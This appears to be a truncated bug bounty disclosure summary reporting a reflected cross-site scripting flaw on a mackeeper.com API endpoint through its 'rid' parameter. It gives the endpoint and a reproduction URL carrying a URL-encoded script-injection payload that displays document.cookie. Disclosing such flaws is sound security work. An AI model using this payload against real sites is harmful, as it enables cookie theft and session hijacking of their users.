Clario: rxss at https://mackeeper.com page not found via rid parameter

Summary Reflected xss at /mk/api/send-event with rid parameter. Vuln endpoint: https://mackeeper.com/mk/api/send-event?rid= payload: alerttest Steps To Reproduce go to https://mackeeper.com/mk/api/send-event?rid=%3C/script%3E%3Cscript%3Ealertdocument.cookie%3C/script%3E payload:...